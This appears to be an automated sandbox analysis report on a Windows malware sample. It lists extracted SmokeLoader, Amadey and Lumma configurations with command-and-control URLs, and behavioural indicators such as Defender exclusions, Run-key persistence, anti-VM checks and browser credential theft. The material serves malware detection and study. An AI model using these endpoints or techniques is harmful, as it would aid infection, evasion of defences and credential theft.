Analysis
-
max time kernel
300s -
max time network
300s -
platform
windows10-1703_x64 -
resource
win10-20240221-en -
resource tags
arch:x64arch:x86image:win10-20240221-enlocale:en-usos:windows10-1703-x64system -
submitted
21-03-2024 22:47
Static task
static1
Behavioral task
behavioral1
Sample
d3b2ce3ab7300d2472d40255036f9d18ae7b8beef0910f8e5692ba7a377dafef.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
d3b2ce3ab7300d2472d40255036f9d18ae7b8beef0910f8e5692ba7a377dafef.exe
Resource
win10-20240221-en
General
-
Target
d3b2ce3ab7300d2472d40255036f9d18ae7b8beef0910f8e5692ba7a377dafef.exe
-
Size
240KB
-
MD5
60b58d8cfd033587a6a6574ca89527c6
-
SHA1
3a6af2c89b5a42af97a62fb187141f4454fa5207
-
SHA256
d3b2ce3ab7300d2472d40255036f9d18ae7b8beef0910f8e5692ba7a377dafef
-
SHA512
b45089d52dd5fbabd2f708e798fed9c93ea50ab2225029221a004626b1e02091c38f0b75f4b047fe9dca6749285d1cc625516a8406fced50603ac672a093dda5
-
SSDEEP
3072:uerZdB7XzxWRdtmqY0HnAsSiIVQ2KTBbykKBdpRSNa:uCZdB7XzxGrHtSBaFKP
Malware Config
Extracted
smokeloader
pub1
Extracted
smokeloader
2022
http://trad-einmyus.com/index.php
http://tradein-myus.com/index.php
http://trade-inmyus.com/index.php
Extracted
amadey
4.17
http://185.215.113.32
-
install_dir
00c07260dc
-
install_file
explorgu.exe
-
strings_key
461809bd97c251ba0c0c8450c7055f1d
-
url_paths
/yandex/index.php
Extracted
amadey
4.17
http://185.215.113.32
-
strings_key
461809bd97c251ba0c0c8450c7055f1d
-
url_paths
/yandex/index.php
Extracted
lumma
https://relevantvoicelesskw.shop/api
https://resergvearyinitiani.shop/api
https://associationokeo.shop/api
Signatures
-
DcRat 3 IoCs
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
Processes:
d3b2ce3ab7300d2472d40255036f9d18ae7b8beef0910f8e5692ba7a377dafef.exeschtasks.exeschtasks.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI d3b2ce3ab7300d2472d40255036f9d18ae7b8beef0910f8e5692ba7a377dafef.exe 4328 schtasks.exe 4160 schtasks.exe -
Detect ZGRat V1 1 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Roaming\Gcode.exe family_zgrat_v1 -
Glupteba payload 17 IoCs
Processes:
resource yara_rule behavioral2/memory/1544-86-0x0000000002D70000-0x000000000365B000-memory.dmp family_glupteba behavioral2/memory/1544-87-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral2/memory/1544-391-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral2/memory/1544-392-0x0000000002D70000-0x000000000365B000-memory.dmp family_glupteba behavioral2/memory/4560-399-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral2/memory/4560-1191-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral2/memory/868-1934-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral2/memory/868-1949-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral2/memory/868-1950-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral2/memory/868-2008-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral2/memory/868-2132-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral2/memory/868-2204-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral2/memory/868-2230-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral2/memory/868-2233-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral2/memory/868-2235-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral2/memory/868-2238-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral2/memory/868-2679-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Processes:
471.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\471.exe = "0" 471.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" 471.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" 471.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" 471.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" 471.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" 471.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" 471.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 5 IoCs
Processes:
explorgu.exeBC61.exeC79D.exeexplorgu.exeexplorgu.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorgu.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ BC61.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C79D.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorgu.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorgu.exe -
Blocklisted process makes network request 3 IoCs
Processes:
rundll32.exerundll32.exepowershell.exeflow pid process 101 2688 rundll32.exe 102 4068 rundll32.exe 112 752 powershell.exe -
Downloads MZ/PE file
-
Modifies Installed Components in the registry 2 TTPs 1 IoCs
Processes:
explorer.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1990815831-2007029909-3877453929-1000\Software\Microsoft\Active Setup\Installed Components explorer.exe -
Modifies Windows Firewall 2 TTPs 1 IoCs
Processes:
netsh.exepid process 3860 netsh.exe -
.NET Reactor proctector 1 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
Processes:
resource yara_rule C:\Users\Admin\AppData\Roaming\Gcode.exe net_reactor -
Checks BIOS information in registry 2 TTPs 10 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
BC61.exeC79D.exeexplorgu.exeexplorgu.exeexplorgu.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion BC61.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C79D.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorgu.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorgu.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorgu.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorgu.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorgu.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion BC61.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C79D.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorgu.exe -
Deletes itself 1 IoCs
Processes:
pid process 3284 -
Executes dropped EXE 18 IoCs
Processes:
4265.exeE6B5.exeF8F6.exe471.exe471.execsrss.exeeiwisawinjector.exewindefender.exewindefender.exeBC61.exeC79D.exeexplorgu.exeDB74.exeDCFB.exeexplorgu.exeGcode.exeexplorgu.exepid process 5008 4265.exe 3504 E6B5.exe 4424 F8F6.exe 1544 471.exe 4560 471.exe 868 csrss.exe 1820 eiwisaw 3340 injector.exe 3608 windefender.exe 3696 windefender.exe 2792 BC61.exe 1584 C79D.exe 3016 explorgu.exe 400 DB74.exe 2852 DCFB.exe 4060 explorgu.exe 2968 Gcode.exe 4868 explorgu.exe -
Identifies Wine through registry keys 2 TTPs 5 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
Processes:
BC61.exeC79D.exeexplorgu.exeexplorgu.exeexplorgu.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-1990815831-2007029909-3877453929-1000\Software\Wine BC61.exe Key opened \REGISTRY\USER\S-1-5-21-1990815831-2007029909-3877453929-1000\Software\Wine C79D.exe Key opened \REGISTRY\USER\S-1-5-21-1990815831-2007029909-3877453929-1000\Software\Wine explorgu.exe Key opened \REGISTRY\USER\S-1-5-21-1990815831-2007029909-3877453929-1000\Software\Wine explorgu.exe Key opened \REGISTRY\USER\S-1-5-21-1990815831-2007029909-3877453929-1000\Software\Wine explorgu.exe -
Loads dropped DLL 3 IoCs
Processes:
rundll32.exerundll32.exerundll32.exepid process 4000 rundll32.exe 2688 rundll32.exe 4068 rundll32.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Windows\windefender.exe upx C:\Windows\windefender.exe upx behavioral2/memory/3608-1948-0x0000000000400000-0x00000000008DF000-memory.dmp upx behavioral2/memory/3696-1951-0x0000000000400000-0x00000000008DF000-memory.dmp upx behavioral2/memory/3696-2133-0x0000000000400000-0x00000000008DF000-memory.dmp upx -
Processes:
471.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" 471.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\471.exe = "0" 471.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" 471.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" 471.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" 471.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" 471.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" 471.exe -
Adds Run key to start application 2 TTPs 3 IoCs
Processes:
471.execsrss.exeGcode.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1990815831-2007029909-3877453929-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" 471.exe Set value (str) \REGISTRY\USER\S-1-5-21-1990815831-2007029909-3877453929-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" csrss.exe Set value (str) \REGISTRY\USER\S-1-5-21-1990815831-2007029909-3877453929-1000\Software\Microsoft\Windows\CurrentVersion\Run\Gcode.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Gcode.exe" Gcode.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 2 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
explorer.exedescription ioc process File opened (read-only) \??\D: explorer.exe File opened (read-only) \??\F: explorer.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 58 ip-api.com -
Manipulates WinMonFS driver. 1 IoCs
Roottkits write to WinMonFS to hide directories/files from being detected.
Processes:
csrss.exedescription ioc process File opened for modification \??\WinMonFS csrss.exe -
Drops file in System32 directory 7 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exedescription ioc process File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
Processes:
BC61.exeC79D.exeexplorgu.exeexplorgu.exeexplorgu.exepid process 2792 BC61.exe 1584 C79D.exe 3016 explorgu.exe 4060 explorgu.exe 4868 explorgu.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
4265.exeF8F6.exedescription pid process target process PID 5008 set thread context of 4384 5008 4265.exe RegAsm.exe PID 4424 set thread context of 1576 4424 F8F6.exe RegAsm.exe -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
Processes:
471.exedescription ioc process File opened (read-only) \??\VBoxMiniRdrDN 471.exe -
Drops file in Windows directory 9 IoCs
Processes:
explorer.exe471.execsrss.exeBC61.exeSearchUI.exeC79D.exedescription ioc process File created C:\Windows\rescache\_merged\4032412167\2900507189.pri explorer.exe File opened for modification C:\Windows\rss 471.exe File created C:\Windows\windefender.exe csrss.exe File created C:\Windows\Tasks\explorgu.job BC61.exe File created C:\Windows\rescache\_merged\2717123927\3950266016.pri explorer.exe File created C:\Windows\rescache\_merged\1601268389\3877292338.pri SearchUI.exe File created C:\Windows\rss\csrss.exe 471.exe File opened for modification C:\Windows\windefender.exe csrss.exe File created C:\Windows\Tasks\explorgu.job C79D.exe -
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exepid process 3536 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
Processes:
WerFault.exeWerFault.exepid pid_target process target process 2440 4384 WerFault.exe RegAsm.exe 4336 3504 WerFault.exe E6B5.exe -
Checks SCSI registry key(s) 3 TTPs 32 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
explorer.exeeiwisawd3b2ce3ab7300d2472d40255036f9d18ae7b8beef0910f8e5692ba7a377dafef.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Capabilities explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 explorer.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI eiwisaw Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI d3b2ce3ab7300d2472d40255036f9d18ae7b8beef0910f8e5692ba7a377dafef.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\HardwareID explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Capabilities explorer.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI eiwisaw Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\ConfigFlags explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Capabilities explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Capabilities explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI eiwisaw Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 explorer.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI d3b2ce3ab7300d2472d40255036f9d18ae7b8beef0910f8e5692ba7a377dafef.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 explorer.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI d3b2ce3ab7300d2472d40255036f9d18ae7b8beef0910f8e5692ba7a377dafef.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 explorer.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 4328 schtasks.exe 4160 schtasks.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
Processes:
SearchUI.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS SearchUI.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU SearchUI.exe -
Processes:
SearchUI.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1990815831-2007029909-3877453929-1000\Software\Microsoft\Internet Explorer\GPU SearchUI.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
windefender.exe471.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exenetsh.exedescription ioc process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-431 = "Iran Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2411 = "Marquesas Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-601 = "Taipei Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1911 = "Russia TZ 10 Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-442 = "Arabian Standard Time" 471.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2772 = "Omsk Standard Time" 471.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-122 = "SA Pacific Standard Time" 471.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-302 = "Romance Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-222 = "Alaskan Standard Time" 471.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-961 = "Paraguay Daylight Time" 471.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-121 = "SA Pacific Daylight Time" 471.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-892 = "Morocco Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-652 = "AUS Central Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-451 = "Caucasus Daylight Time" 471.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time" 471.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-434 = "Georgian Daylight Time" 471.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1721 = "Libya Daylight Time" 471.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1971 = "Belarus Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2372 = "Easter Island Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1802 = "Line Islands Standard Time" 471.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-211 = "Pacific Daylight Time" 471.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2371 = "Easter Island Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-52 = "Greenland Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time" 471.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2062 = "North Korea Standard Time" 471.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-162 = "Central Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-602 = "Taipei Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-351 = "FLE Daylight Time" 471.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-432 = "Iran Standard Time" 471.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (str) 